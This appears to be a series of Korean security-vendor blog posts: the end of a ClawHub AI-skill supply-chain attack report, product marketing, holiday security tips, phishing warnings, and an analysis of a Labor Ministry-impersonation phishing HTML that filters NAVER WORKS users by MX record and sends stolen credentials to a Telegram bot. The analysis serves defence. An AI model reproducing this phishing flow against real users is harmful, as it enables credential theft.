업로드되는 모든 스킬을 VirusTotal과 연동 및 ClawHub 자체 엔진을 통해 자동 스캔하는 시스템을 도입했습니다. 악성 코드가 포함된 패키지는 사전 차단되거나 경고가 표시됩니다.
ClawHub 내부적으로는 스킬에 대해 평가하는 시스템을 구축하여 목적,능력, 지침범위,설치 방식, 신원, 지속성 및 권한 등에 대한 평가를 확인 할 수 있습니다.

[그림 4] VirusTotal 및 OpenClaw 스캔 결과 화면

업로더 검증 강화
일정 기간 활동한 GitHub 계정을 보유한 업로더만 스킬을 게시할 수 있도록 제한했으며, 사용자 신고 기능도 추가되었습니다.
사용자 주의 권고
외부 명령 실행을 요구하는 스킬 설치 시 신중한 검토가 필요하며, 검증되지 않은 스킬 설치는 지양할 것을 권고하고 있습니다.

이번 ClawHub 공급망 공격은 npm, PyPI 등 전통적인 패키지 저장소에서 발생하던 공급망 공격이 AI 에이전트 확장 생태계로 확산되었음을 보여줍니다.

AI 기반 도구의 활용이 증가하는 만큼, 개발자와 사용자 모두 기본적인 보안 수칙을 준수하고 공급망 위협에 대한 경각심을 유지해야 할 것입니다.

참고 출처:

https://www.kucoin.com/news/flash/slowmist-reports-large-scale-supply-chain-poisoning-attack-on-openclaw-s-clawhub?utm_source=chatgpt.com

이스트시큐리티와 함께 안전한 2026년 보내세요!

알약5 — Thu, 12 Feb 2026 17:00:52 +0900

안녕하세요, 이스트시큐리티입니다.

이스트시큐리티를 아껴주시고 함께해 주신 모든 분들께 2026 병오년 설 명절을 맞아 깊은 감사의 인사를 드립니다.

지난 한 해 동안 보내주신 신뢰와 응원 덕분에 이스트시큐리티는 빠르게 변화하는 보안 환경 속에서도 한 걸음 더 성장할 수 있었습니다. 고객과 파트너 여러분과 함께 만들어 온 모든 순간은 저희에게 큰 의미이자 앞으로 나아가기 위한 소중한 밑거름이 되었습니다.

2026년에도 이스트시큐리티는 보다 가까이에서 소통하며, 변화하는 위협에 선제적으로 대응하는 신뢰받는 보안 파트너로서 더 안전한 디지털 환경을 만들어 나가겠습니다!

풍요롭고 따뜻한 설 연휴 보내시길 바라며, 새해에도 건강과 행복이 늘 함께하시길 기원합니다.

감사합니다.

이스트시큐리티 드림

제로트러스트 보안 전환을 위한 '알약 ZePP' 핵심 포인트

알약5 — Thu, 12 Feb 2026 14:32:03 +0900

by 이스트시큐리티 마케팅팀

안녕하세요, 이스트시큐리티입니다.

오늘날 기업의 보안 환경은 급격하게 변화하고 있습니다. 클라우드 전환, 원격 근무 확대, BYOD 도입 등으로 '네트워크 경계'라는 개념이 사라지고 있고, 한 번 인증을 통과하면 내부를 신뢰하는 기존 보안 모델로는 더 이상 지능화된 위협에 대응하기 어려운 시대가 되었습니다. 이제 보안의 기본 전제는 *제로트러스트(Zero Trust) 로 전환되고 있습니다.

*제로트러스트(Zero Trust)

기존의 경계 기반 보안처럼 내부 사용자를 신뢰하는 방식이 아니라, 네트워크 안팎을 구분하지 않고 모든 사용자·기기·접속 요청을 지속적으로 검증하는 보안 모델입니다. “절대 신뢰하지 말고, 항상 검증하라(Never Trust, Always Verify)”는 원칙을 기반으로 하며, 다단계 인증(MFA), 최소 권한 원칙(Least Privilege), 지속적 모니터링 등을 통해 내부 침해 및 계정 탈취 위협을 최소화합니다.

오늘은 제로트러스트 보안을 실현하는 이스트시큐리티의 통합 보안 플랫폼, '알약 ZePP'의 핵심 기능과 도입 효과를 소개합니다. 조직의 보안 체계 전환을 고민하고 계시다면, 끝까지 읽어보시고 실질적인 인사이트를 얻어가시길 바랍니다.

왜 제로트러스트인가? — 기존 경계형 보안의 한계

'내부는 안전하다'는 전제의 붕괴

기존 보안 모델은 방화벽과 VPN을 중심으로 내부 네트워크를 신뢰하는 구조였습니다.

그러나 원격 근무와 클라우드 환경이 확산되면서 내부와 외부의 경계가 모호해졌고, 내부에 침투한 위협이 자유롭게 확산되는 이른바 '내부 횡이동(Lateral Movement)' 공격이 급증하고 있습니다.

한 번의 인증만으로 내부 자원에 무제한 접근을 허용하는 구조는 더 이상 안전하지 않습니다

VPN 기반 접근 제어의 한계

VPN은 연결 시점에만 인증을 수행하고, 이후에는 별도의 검증 없이 내부 네트워크 전체에 접근할 수 있는 구조입니다. 이는 단말이 악성코드에 감염되거나 비인가 사용자가 접속하더라도 내부 확산을 막기 어렵다는 근본적인 한계를 가지고 있습니다.

접근 시점뿐만 아니라, 접근 중에도 지속적으로 신뢰를 검증하는 체계가 필요합니다.

분산된 보안 정책의 관리 부담

엔드포인트 보안, 네트워크 보안, 접근 제어 등이 각각 독립적으로 운영되다 보니 정책의 일관성을 유지하기 어렵고, 보안 사각지대가 발생하기 쉽습니다. 특히 조직 규모가 커질수록 관리 복잡성이 기하급수적으로 증가합니다.

엔드포인트, 네트워크, 애플리케이션 접근 정책을 하나의 플랫폼에서 통합 관리하는 것이 효율적입니다.

이러한 한계를 극복하기 위해, 글로벌 보안 기준은 이미 '경계형 보안'에서 '제로트러스트'로 빠르게 전환되고 있습니다. NIST SP 800-207과 KISA 제로트러스트 가이드라인 2.0이 발표되면서 공공기관과 기업 모두에서 제로트러스트 도입이 가속화되고 있습니다.

한눈에 비교하기 - 경계형 보안 vs제로트러스트

구분	기존 경계형 보안	제로트러스트 보안
기본 전제	내부는 신뢰, 외부는 차단	모든 접근을 검증, 아무것도 신뢰하지 않음
인증 방식	최초 1회 인증 후 자유 접근	접근 전·중·후 지속적 검증
네트워크 구조	경계 안은 평면(Flat) 네트워크	마이크로 세그멘테이션으로 세분화
내부 위협 대응	횡이동 탐지 어려움	세분화된 통제로 확산 차단
정책 관리	솔루션별 개별 정책 운영	단일 플랫폼 통합 정책 관리
원격 근무 대응	VPN 의존, 확장 한계	SDP 기반 동적 접근 제어

알약 ZePP : 제로트러스트를 실현하는 통합 보안 플랫폼

이스트시큐리티의 '알약 ZePP(ZeroTrusted Endpoint Protection Platform)'는 제로트러스트 원칙을 기반으로 설계된 통합 보안 플랫폼입니다. 엔드포인트와 네트워크 전반의 신뢰도를 실시간으로 분석하고, 다양한 위협을 사전에 차단하며 즉시 대응할 수 있는 보호 체계를 제공합니다.

알약 및 알약 EDR의 강력한 엔드포인트 보안 역량에 SDP 기반 접근 제어, 마이크로 세그멘테이션, 신뢰도 점수 기반 자동 정책 조정 기능을 결합하여, 기업 및 기관의 업무 환경을 안전하게 보호합니다.

Q. 기존에 알약, EDR을 쓰고 있는데 ZePP를 별도로 도입해야 하나요?

A. 알약 ZePP는 기존 알약·알약 EDR 위에 제로트러스트 접근 제어 계층을 얹는 구조입니다. 기존 엔드포인트 보안 투자를 그대로 활용하면서, SDP·마이크로 세그멘테이션·신뢰도 기반 정책까지 확장할 수 있어 추가 도입 부담을 최소화할 수 있습니다.

1. 제로트러스트 표준 준수

알약 ZePP는 NIST SP 800-207(Zero Trust Architecture) NIST SP 800-207에서 제시하는 제로트러스트 기본 원칙(tenets)에 기반해 설계되었습니다.

국제 및 국내 표준을 기반으로 공공기관과 기업 환경 모두에서 신뢰성 높은 제로트러스트 보안 운영이 가능합니다.

2. 동적 접근 제어 및 네트워크 보호

SDP(Software Defined Perimeter) : 네트워크와 엔드포인트 자산에 대한 동적 접근 제어를 통해 비인가 접근을 원천 차단하고, 중요 자산에 대한 안전한 접속을 보장합니다.
Micro Segmentation : 네트워크를 세분화하여 주요 데이터와 시스템을 보호하고, 내부 확산(Lateral Movement)을 효과적으로 방지합니다.

3. 엔드포인트 인증 및 신뢰도 기반 접근 통제

SDP 기반 단말 인증 및 접근 통제 : 등록된 디바이스와 사용자만 서비스에 접근하도록 통제하며, 비인가 장비의 접근을 원천 차단합니다.
신뢰도 기반 접근 통제 : 허용된 단말이라도 사용자 행위와 신뢰도에 따라 권한을 동적으로 조정하여 보다 세밀한 보안 통제를 제공합니다.

[이미지] 알약 ZePP 제품 UI / (좌) 관리콘솔 (우) 에이전트

4. 위협 탐지 및 대응

악성코드 및 랜섬웨어 대응 : 알약 기반 EDR 및 행위 분석 기술을 통해 멀웨어 및 랜섬웨어를 탐지·차단하고, 위협 이벤트를 통합 관리합니다.
실시간 위협 이벤트 기반 대응 : 탐지된 위협 정보를 즉시 정책 엔진에 반영하여, 보안 정책을 자동으로 최적화하고 대응 속도를 높입니다.

5. 신뢰도 점수 기반 보안 운영

사용자·디바이스·네트워크·애플리케이션의 상태와 행위를 종합적으로 분석하여 신뢰도를 수치화하고, 위험도 변화에 따라 접근 정책을 동적으로 조정합니다.

User	Device	Network	Application
인증 수준, 행위 이상 여부	OS 패치 상태, 보안 정책 준수 여부	비정상 트래픽, 비인가 접속 시도	정책 위반 소프트웨어 실행 여부

Q. 신뢰도 점수가 일정 기준 이하로 하락하면?

접근 권한 자동 축소 → 추가 인증 요구 → 필요 시 네트워크 격리까지 자동 수행

6. 통합 보안 정책 관리

네트워크, 파일, 애플리케이션 접근 정책을 하나의 플랫폼에서 통합적으로 관리하며, 조직 전체 보안 정책의 일관성을 유지합니다. 조직 및 업무 환경 요구에 적합한 정책을 유연하게 구성할 수 있어, 대규모 환경에서도 효율적인 운영이 가능합니다.

알약 ZePP 도입 효과

도입 효과	핵심 포인트
보안 리스크 감소	제로트러스트 기반 지속 검증으로 비인가 접근 차단, 멀웨어·랜섬웨어 신속 대응, 실시간 컨텍스트 기반 접근 제어. NIST·KISA 표준 부합
자동화 기반 운영 효율화	직관적 대시보드·통합 정책 관리로 모니터링 및 대응 속도 향상. 신뢰도 변화 기반 자동 정책 조정으로 운영자 부담 감소
단계적 전환 및 비용 절감	단일 플랫폼 통합으로 중복 솔루션 축소·유지보수 비용 절감. Open API 기반 기존 인프라 연동으로 단계적 전환 가능

✔ 이런 조직이라면, 알약 ZePP 도입을 검토해보세요!

- VPN 접속 후 내부 자원에 대한 통제가 부족하다고 느끼는 조직

- 원격 근무·재택근무 확대로 접근 제어 정책 재설계가 필요한 조직

- 공공기관 제로트러스트 가이드라인 대응이 필요한 조직

- 기존 알약·알약 EDR 환경에서 제로트러스트로 확장하고 싶은 조직

- 보안 솔루션 통합으로 운영 비용을 절감하고 싶은 조직

경계가 사라진 시대, '모든 접근을 검증한다'는 원칙이 보안의 새로운 기준이 되고 있습니다. 기존 VPN과 경계형 보안 체계의 한계를 체감하고 계시다면, 지금이 바로 제로트러스트 보안 전환을 시작할 때입니다.

이스트시큐리티가 고객사의 환경에 최적화된 제로트러스트 보안 체계 구축을 도와드리겠습니다. 알약 ZePP에 관해 더 자세한 정보가 필요하시면, 무료 보안 컨설팅 신청을 통해 제품 데모와 고객 사례를 직접 확인해보세요!

"지금 사무실인가요?"... 대표님 사칭 피싱 메일 주의!

알약4 — Wed, 11 Feb 2026 14:49:32 +0900

최근 주요 기업을 대상으로 대표이사나 임원을 사칭한 피싱 메일이 지속적으로 유포되고 있습니다.

이번 공격은 직접적인 악성 행위 대신, 메일 수신자의 반응을 유도하는 사회공학적 기법을 적극적으로 활용하고 있습니다.

1. 피싱 메일 유형

현재 유포 중인 피싱 메일은 “회신을 유도하는 유형”과 “QR코드 전송을 요구”하는 두 가지 형태로 확인됩니다.

유형1. 직접적인 회신 유도 - 회사 대표를 사칭해 수신자가 긴급히 회신하도록 유도합니다.

[그림 1] 피싱 메일 유형1

유형2. 메신저 QR 코드 전송 요구 - 원활한 업무 연락을 명목으로 메신저 채팅방 QR코드 생성을 요구합니다.

[그림 2] 피싱 메일 유형2

2. 피싱 메일 주요 특징

권위 사칭: 대표이사, 회장 등 조직 내 상급자의 직위를 악용합니다.
탐지 우회: 공격자는 기업 보안 장비의 필터링을 피하기 위해 Gmail 및 Hotmail 계정을 이용하여 메일을 발송합니다.
공용 메일 타겟팅: 기업 홈페이지 등에 공개된 대표 메일이나, 채용 메일 등을 주요 타겟으로 삼습니다.
단계적 공격: 초기에 직접적인 악성 코드 배포 대신 사용자의 반응을 유도하여 경계심을 낮추고 이후 실제 공격을 위한 정찰단계일 가능성이 높습니다.

3. 대응 가이드라인 및 예방 수칙

✔ 발신자 주소 재확인: 발신자명이 아닌 발신자 메일주소가 회사 메일 계정이 맞는지 확인해야 합니다.

✔ 교차 확인 필수: 메신저 요구나 긴급한 요청을 받았을 경우, 전화 또는 사내 메신저 등 기존의 공식 채널을 통해 정상 메일 여부를 확인합니다.

✔ 외부 채널 접속 지양: 업무상 필요한 소통은 사내 공식 채널을 통해 진행하고, 검증되지 않은 외부 단톡방이나 QR 코드 공유는 지양해야 합니다.

✔ 사내 보안팀 신고: 의심스러운 메일을 수신했다면 답변하지 말고 즉시 사내 보안 담당 부서로 공유합니다.

최근 피싱 공격은 사람의 심리를 노려 이성적인 판단을 흐리게 하는 사회공학 기반의 공격으로 갈수록 교묘해지고 있습니다.

임원 및 경영진을 사칭한 긴급 요청 메일을 수신했을 경우 즉시 대응하기보다 반드시 공식 채널을 통해 사실 확인 절차를 거쳐 피해를 예방하시기 바랍니다.

안전한 설 연휴를 위한 6가지 보안수칙

알약5 — Wed, 11 Feb 2026 10:24:50 +0900

by 이스트시큐리티 마케팅팀

안녕하세요, 이스트시큐리티입니다

설 연휴는 가족과 함께 휴식을 즐기는 소중한 시간이지만, 사이버 공격자들에게는 보안 공백을 노릴 수 있는 기회이기도 합니다. 연휴 기간에는 담당자 부재로 인해 보안 사고 발생 시 즉각적인 대응이 어려운 경우가 많고, 특히 2026년에는 생성형 AI를 활용한 공격이 전방위로 확산되며 위협의 정교함이 한층 높아졌습니다.

안전한 설 연휴를 보내기 위해, 꼭 점검해야 할 6가지 보안 수칙을 정리해 드립니다.

딥페이크·AI 피싱 주의

1) AI가 만든 '진짜 같은 가짜'에 속지 마세요!

최근 사이버 공격자들은 생성형 AI를 활용해 실제 인물의 목소리와 얼굴을 정교하게 모방하는 딥페이크 기반 사기를 적극 활용하고 있습니다. 가족이나 지인을 사칭한 영상 통화, 금융기관 직원을 가장한 AI 음성 전화(비싱) 등이 명절 연휴를 전후해 증가할 가능성이 큽니다.

또한 자연스러운 한국어로 작성된 AI 피싱 메일은 기존의 어색한 번역투 메일과 달리 구분이 쉽지 않습니다. 포털 로그인, 택배 조회, 계정 보안 점검 등을 위장한 맞춤형 피싱 공격 역시 더욱 정교해지고 있습니다.

이렇게 대비하세요!

▪︎ 영상 통화나 음성 전화로 긴급 송금을 요청받을 경우, 반드시 다른 연락 수단으로 사실 여부를 확인하세요.

▪︎ 이메일·문자에 포함된 링크 클릭 전, 발신자 주소와 URL을 꼼꼼히 확인하세요.

▪︎ 주요 계정에는 반드시 다단계 인증(MFA)을 설정하세요.

AI 강화 스미싱 주의

2) ‘결제 완료’·‘배송 지연’ 문자, 바로 반응하지 마세요!

명절 선물 배송이 집중되는 시기를 노려 쇼핑몰 결제, 택배 배송, 해외 직구를 위장한 스미싱이 급증합니다. 2026년에는 AI가 수신자의 이름이나 행동 패턴을 분석해 메시지를 자동 생성하는 ‘적응형 스미싱’ 공격도 확산되고 있습니다.

특히 문자에 링크 대신 고객센터 전화번호를 삽입해 전화를 유도하는 방식은 여전히 빈번하게 활용되고 있습니다. 전화를 걸 경우, AI 음성 응답 시스템을 통해 악성 앱 설치나 개인정보 입력을 유도하는 사례가 보고되고 있습니다.

이렇게 대비하세요!

▪︎ 출처가 불분명한 문자의 링크 클릭이나 전화 연결은 피하세요.

▪︎ 결제·배송 확인은 반드시 공식 앱이나 웹사이트를 통해 직접 진행하세요.

▪︎ 스마트폰에는 신뢰할 수 있는 모바일 백신을 설치하고 실시간 감시 기능을 활성화하세요.

AI 위장 쇼핑몰·가짜 고객센터 주의

3) AI 챗봇이 있는 사이트라고 해서 안전하지는 않습니다!

2026년의 새로운 위협 중 하나는 AI 챗봇을 탑재한 가짜 사이트입니다. 설 연휴 선물 구매가 늘어나는 시기, 공격자들은 생성형 AI를 활용해 가짜 쇼핑몰이나 고객센터 사이트를 대량 생성합니다. 정상 쇼핑몰과 매우 유사한 디자인과 자연스러운 상담으로 사용자를 안심시킨 뒤, 결제 정보나 개인정보 입력을 유도하는 방식입니다.

특히 SNS 광고나 검색 결과를 통해 노출되는 ‘특가 할인’ 사이트 중 일부는 이러한 위장 사이트일 가능성이 있어 각별한 주의가 필요합니다.

이렇게 대비하세요!

▪︎ 처음 방문하는 쇼핑몰은 사업자 정보, 고객 후기, 도메인 등록 정보를 확인하세요.

▪︎ 과도한 할인율을 강조하는 광고 링크는 의심하고, 공식 사이트 주소를 직접 입력해 접속하세요.

▪︎ 콘텐츠 다운로드는 반드시 공식 앱스토어 또는 공식 웹사이트를 이용하세요.

네트워크 보안 점검

4) 여행지에서의 공용 Wi-Fi 사용, 주의하세요!

귀성길이나 여행지에서 공개 Wi-Fi를 사용하는 경우, 공격자가 정상 Wi-Fi 이름을 위장하거나 DNS를 조작해 피싱 사이트로 유도하는 위험이 존재합니다.

2026년에는 스마트폰 AI 비서나 에이전트 앱이 백그라운드에서 자동으로 네트워크에 접속하는 사례도 늘어나며, 불안정한 네트워크 환경에서 정보 노출 가능성이 커졌습니다.

이렇게 대비하세요!

▪︎ 공개 Wi-Fi 사용 시 금융 거래나 로그인 서비스 이용은 자제하세요.

▪︎ 불가피할 경우 VPN 사용을 고려하세요.

▪︎ AI 에이전트·비서 앱의 네트워크 접근 권한과 백그라운드 활동을 점검하세요.

기업 보안 담당자를 위한 점검 포인트

5) 연휴 기간, 기업 보안 공백을 노린 랜섬웨어에 대비하세요!

연휴와 주말은 기업 보안 공백을 노린 공격이 집중되는 시기입니다. 최근 랜섬웨어 공격은 MFA 우회, 공급망 침투, 자동화된 AI 공격과 결합되며 더욱 고도화되고 있습니다.

오픈소스 패키지를 사칭하는 공격이나 클라우드 서비스를 경유한 공격도 빈번하게 발생하고 있습니다.

기업 보안 담당자라면, 이렇게 대비하세요!

▪︎ 연휴 전 서버, 인프라, 임직원 PC의 보안 패치를 완료하세요.

▪︎ 중요 데이터는 3-2-1 백업 원칙에 따라 오프라인 백업을 반드시 점검하세요.

▪︎ 비상 연락망과 연휴 중 모니터링 체계를 사전에 확인하세요.

▪︎ 새로 도입한 AI 시스템·챗봇의 접근 권한과 인증 설정을 재점검하세요.

IoT 보안 및 개인정보 노출 주의

6) 귀성·여행 전, 스마트홈과 SNS를 점검하세요!

연휴 동안 장기간 집을 비우는 가정이 늘어나면서 스마트 도어락, IP 카메라 등 IoT 기기를 노린 공격 위험도 증가합니다. 기본 비밀번호를 그대로 사용하거나 패치가 적용되지 않은 기기는 AI 기반 자동 공격의 대상이 될 수 있습니다.

또한 SNS에 실시간으로 여행 일정이나 위치를 공유하는 행위는 부재중인 가정을 노출시키거나, 사회공학적 공격의 단서가 될 수 있습니다.

이렇게 대비하세요!

▪︎ 스마트홈 기기의 펌웨어를 최신 버전으로 업데이트하고 기본 비밀번호를 변경하세요.

▪︎ 외부 접근이 가능한 기기에는 2단계 인증을 설정하세요.

▪︎ 여행 중 SNS 실시간 게시물 업로드는 자제하고, 귀가 후 공유하세요.

▪︎ 사용하지 않는 IoT 기기는 전원을 끄거나 네트워크 연결을 해제하세요.

AI 기술의 발전은 생활을 더욱 편리하게 만들고 있지만, 이를 악용한 사이버 위협 역시 함께 진화하고 있습니다. 위 보안 수칙을 한 번 더 점검하시고, 이스트시큐리티와 함께 안전하고 편안한 설 연휴 보내시기 바랍니다.

온라인 금융 자산을 노린 사이버 공격 급증! 개인과 기업의 대처법은?

알약5 — Tue, 10 Feb 2026 12:35:50 +0900

by 이스트시큐리티 마케팅팀

안녕하세요, 이스트시큐리티입니다.

디지털 금융 환경이 고도화될수록 사이버 범죄의 표적 역시 점점 더 ‘현실적인 자산’으로 이동하고 있습니다. 최근 아랍에미리트연합(UAE)에서 온라인 금융 자산을 노린 사이버 공격이 급증하면서, 정부 차원의 공식 경고가 발표돼 주목받고 있습니다.

온라인 금융 자산을 노린 공격, 왜 지금 더 위험할까?

*UAE Cyber Security Council은 최근 성명을 통해 개인과 기업을 대상으로 한 금융 정보 탈취형 사이버 범죄가 빠르게 확산되고 있다고 경고했습니다. 공격자들은 은행 로고를 그대로 복제한 가짜 광고와 메시지를 활용해 사용자를 기만하고, 이를 통해 이메일 계정 침입이나 로그인 정보 탈취로 이어지는 공격을 시도하고 있습니다.

특히 전체 공격의 약 60%가 계정 정보 도난에서 비롯된다는 점은, 단순한 피싱을 넘어 ‘계정 탈취 이후의 2차 피해’가 본격화되고 있음을 보여줍니다.

*UAE Cyber Security Council
아랍에미리트 사이버 보안 위원회)는 UAE 연방 정부 산하의 국가 사이버 보안 최고 기구로, 국가 사이버 보안 전략을 총괄·조정하는 국가 사이버 권위 기관 역할을 수행

이러한 공격의 공통점은 기술적 취약점보다 사용자의 보안 습관을 노린다는 점입니다. 보안이 취약한 기기에 비밀번호나 금융 정보를 저장해 두거나, 출처가 불분명한 메시지를 무심코 클릭하는 순간 공격은 시작됩니다. 무료 와이파이 환경에서의 금융 거래 역시 공격자 입장에서는 매우 매력적인 침투 지점입니다.

개인 사용자뿐 아니라 기업에도 중요한 경고

이번 경고는 개인 금융 사고에 국한된 이슈가 아닙니다. 업무용 메일 계정이나 협업 도구 계정이 탈취될 경우, 기업 내부 정보 유출은 물론 거래처 사칭, 송금 사기(BEC) 등으로 이어질 가능성도 큽니다.

실제로 글로벌 보안 사고 사례를 보면 개인 계정 탈취가 기업 침해 사고의 출발점이 되는 경우가 점점 늘고 있습니다.

UAE 사이버보안위원회는 이러한 위협에 대응하기 위해 사용자 행동 중심의 예방 수칙을 강조했습니다.

공식 채널이 아닌 메시지는 반드시 진위 여부를 확인할 것, 계좌와 거래 내역을 주기적으로 모니터링할 것, 2단계 인증(2FA)을 활성화할 것, 운영체제와 애플리케이션을 최신 상태로 유지할 것 등이 핵심입니다.

여기에 실시간 은행 알림 서비스를 함께 활용하면 의심스러운 거래를 보다 빠르게 인지하고 대응할 수 있습니다.

디지털 전환 시대, 보안 인식이 곧 자산 보호입니다

UAE 정부는 이번 경고를 ‘사이버 펄스(Cyber Pulse)’ 캠페인의 일환으로 발표하며, 디지털 대전환 환경에서 국민의 안전과 프라이버시, 그리고 사이버 회복력을 동시에 강화하는 것이 목표라고 밝혔습니다. 단발성 경고가 아니라, 지속적인 인식 개선과 실천이 결합될 때 안전한 디지털 환경을 만들 수 있다는 점을 분명히 한 것입니다.

온라인 금융 자산을 노린 공격은 특정 국가나 특정 사용자만의 문제가 아닙니다. 클릭 한 번, 저장된 비밀번호 하나가 예상치 못한 피해로 이어질 수 있는 시대인 만큼, 개인과 조직 모두가 기본적인 보안 수칙을 다시 점검해야 할 시점입니다. 디지털 환경에서의 작은 습관 변화가 가장 확실한 보안 대응이 될 수 있습니다.

[위 이미지를 클릭하면 엔드포인트 보안 솔루션으로 이동합니다]

금융 정보 탈취와 계정 도용 공격이 고도화될수록, 개인의 보안 수칙 실천과 함께 기업 차원의 선제적 보안 대응 역시 중요해지고 있습니다.

이스트시큐리티는 엔드포인트 보안과 위협 인텔리전스 기반 탐지·대응 기술을 바탕으로, 계정 탈취 이후 발생할 수 있는 2차 피해까지 고려한 통합 보안 환경을 제공합니다.

사용자 보안 인식과 기업 보안 체계가 함께 작동할 때, 비로소 실질적인 금융·정보 자산 보호가 가능해집니다. 이스트시큐리티는 그 연결의 중심에서, 각 기업의 환경과 위협 수준을 면밀히 진단하고 최적의 보안 전략을 함께 설계합니다.

현재의 보안 체계가 최신 위협 환경에 충분히 대응하고 있는지 점검이 필요하다면, 아래 배너를 클릭하고 기업 맞춤형 무료 보안 컨설팅을 통해 전문가와 함께 현실적인 대응 방안을 확인해 보시기 바랍니다.

고용노동부 사칭 피싱 유포 사례 분석 - 이메일 도메인 분석까지 수행하는 ‘정밀 타겟형’ 공격

알약4 — Fri, 6 Feb 2026 15:37:10 +0900

최근 이스트시큐리티 대응센터(ESRC)에서 운영 중인 APT TDS(Threat Detection System)를 통해, 네이버웍스 사용자를 겨냥한 고도화된 피싱 공격이 포착되었습니다.

이번 공격은 단순 유포형 피싱을 넘어 기업의 메일 환경을 식별하는 정밀함을 보이고 있으며, 현재 TDS에 기록된 실시간 탐지 데이타와 연관정보를 토대로 해당 피싱 공격에 대해 분석한 내용을 공유해 드립니다.

1. 피싱 메일 및 유포 방식

피싱 메일은 '[공문/필수]2027년 고용노동부 노동정책 포럼 자료 제출 요청' 이라는 제목으로 유포되었습니다.

사회공학적 기법: 메일 본문에 고용노동부(MOEL) 및 공식 협력사를 사칭한 법적 근거와 참조 코드를 명시하여 사용자의 의심을 피합니다.
HTML 첨부파일: '2027년_고용노동부_노동포럼_설문_입력창-(수신자 메일주소)'와 같이 수신자의 메일주소가 포함된 HTML파일을 첨부하여 실행을 유도합니다.

[그림 2] 피싱 메일 본문

2. 공격 흐름

① HTML 첨부파일 실행 및 이메일 도메인 추출

사용자가 첨부된 HTML 파일을 공문 파일로 오인하여 실행하면 파일 내부에 포함된 스크립트가 동작하면서 코드에 하드코딩된 사용자 이메일 주소에서 도메인을 추출합니다.

② DNS MX 레코드 조회를 통한 네이버웍스 사용자 필터링

도메인 추출 후 Google 및 Cloudflare의 DNS API를 호출하여 추출된 도메인의 MX(Mail Exchanger) 레코드를 조회합니다.

이후 최우선(priority) MX 서버 문자열에 worksmobile(네이버웍스) 포함 여부를 확인하여 네이버웍스 사용자인지를 판단합니다.

MX(Mail Exchanger) 레코드란?

MX 레코드(Mail Exchanger Record)는 DNS에서 해당 도메인의 이메일을 어디로 전달해야 하는지 알려주는 정보입니다.
예를 들어 user@example.com 라는 메일주소로 메일을 보내는 경우 해당 메일주소만으로는 전달될 수 없고 실제 메일을 수신하는 서버 위치를 알아야 전송이 가능합니다. 이때 사용되는 것이 DNS의 MX(Mail Exchanger) 레코드 입니다.
하나의 도메인에는 여러 MX 레코드가 존재할 수 있으며, 각 레코드에는 우선순위(Priority) 값이 설정됩니다. 숫자가 낮을수록 우선 사용되는 최우선 MX 서버를 의미하며, 공격자는 이 서버 문자열을 통해 해당 도메인의 메일 서비스 종류를 식별할 수 있습니다.

[그림 3] DNS MX 레코드 조회 및 도메인 검증 코드

③ 조건부 로그인 페이지 표시 및 비밀번호 입력 유도

네이버웍스 사용자로 확인된 경우에만 공격자가 제작한 로그인 페이지를 표시하여 비밀번호 입력을 유도합니다.

다른 메일 서비스를 사용하는 경우에는 로그인 페이지를 표시하지 않고 빈페이지로 이동시켜 공격을 종료합니다.

[그림 4] 로그인 페이지

④ 계정 정보 탈취 및 Telegram 실시간 전송

사용자가 로그인 화면에 입력한 정보는 공격자가 제어하는 Telegram Bot API를 통해 실시간으로 전송됩니다.

탈취 항목: 사용자 이메일 계정, 비밀번호, 브라우저 정보 (첨부된 HTML 파일 실행 브라우저 유형)

[그림 5] 계정 정보 탈취 코드

[그림 6] 공격자에게 전송되는 계정 정보

[그림 7] 공격자의 텔레그램 봇 계정

⑤ 재입력 유도 및 정상 사이트로 리다이렉트

입력 정보의 정확도를 높이기 위해 최소 2회까지 가짜 오류 메시지(인증 또는 시스템 오류)를 표시하여 사용자가 비밀번호를 반복 입력하도록 유도합니다.

이후 정상 메일 서비스 페이지로 이동시켜 사용자가 피싱 공격을 인지하기 어렵게 만듭니다.

[그림 8] 비밀번호 입력 시 팝업되는 가짜 오류메세지

3. 분석 방해 기능

첨부된 HTML 파일 내부 코드에는 분석가의 코드 분석을 방해하기 위해 다음과 같은 기법이 적용되어 있습니다.

스크립트 난독화: 함수와 변수명을 무작위 문자열로 치환하여 가독성을 떨어뜨립니다.
마우스 우클릭 및 개발자 도구 차단: 웹 페이지 내에서의 마우스 우클릭 및 주요 단축키 입력을 차단합니다.

분류	차단 항목
우클릭	contextmenu (마우스 우클릭 메뉴)
개발자 도구	F12, Ctrl+Shift+I
소스 보기	Ctrl+U
페이지 저장	Ctrl+S
복사/선택	Ctrl+C, Ctrl+A, Ctrl+X

[표 1] 차단되는 항목

4. 보안 권고 사항 및 예방 방법

기업 메일을 사용하는 환경에서는 다음 예방 수칙을 반드시 준수하여 피해를 방지하시기 바랍니다.

첨부된 HTML 파일 내 로그인 금지: 메일 첨부파일인 HTML을 실행했을 때, 계정 정보 입력을 요구한다면 피싱일 가능성이 매우 높습니다. 공식 기관은 첨부파일을 통해 기관 공식 사이트 로그인을 진행하도록 안내하지 않습니다.
다요소 인증(MFA) 필수 설정: 피싱 페이지에서 비밀번호를 입력했더라도, OTP(일회용 비밀번호)나 생체 인증 등 추가 수단이 설정되어 있다면 공격자가 계정에 최종 로그인하는 것을 차단할 수 있습니다.
보안 인식 교육 및 정책 강화: 기업은 정기적인 피싱 대응 교육, 메일 보안 정책, 접근 통제 및 이상 로그인 모니터링을 통해 조직 차원의 대응 체계를 강화해야 합니다.

이번 공격은 단순한 대량 유포형 피싱이 아닌, 수신자의 이메일 도메인을 분석하여 기업 사용자를 정밀 타겟팅하는 고도화된 공격이라는 점에서 더욱 위험합니다.

특히 공문/정부기관/협력사 등을 사칭하는 공격은 실제 업무 흐름과 유사해 사용자가 쉽게 속을 수 있습니다. 의심스러운 메일의 첨부파일 실행과 계정 정보 입력은 곧바로 계정 탈취로 이어질 수 있으므로, 기업사용자 분들은 보안 수칙을 생활화하고 조직 차원의 지속적인 보안 인식 교육과 점검이 필요합니다.

IoC

Indicator	Type	Description	Detection Name
21DB441D894FAC05C3C4B9085877F49C	MD5	피싱 HTML 파일	Trojan.HTML.Phish

이스트시큐리티 공인 파트너 대상, ‘파트너 킥오프(Kick-Off) 2026’ 행사 성료

알약5 — Fri, 6 Feb 2026 14:30:44 +0900

by 이스트시큐리티 마케팅팀

안녕하세요, 이스트시큐리티입니다.

이스트시큐리티가 지난 2월 5일, 서울 양재 엘타워 오르체홀에서 공인 파트너사를 대상으로 ‘EST Partner Kick-Off 2026’ 행사를 개최하고, 2026년 사업 전략과 AI 기반 보안 비전을 공유하는 뜻깊은 시간을 가졌습니다.

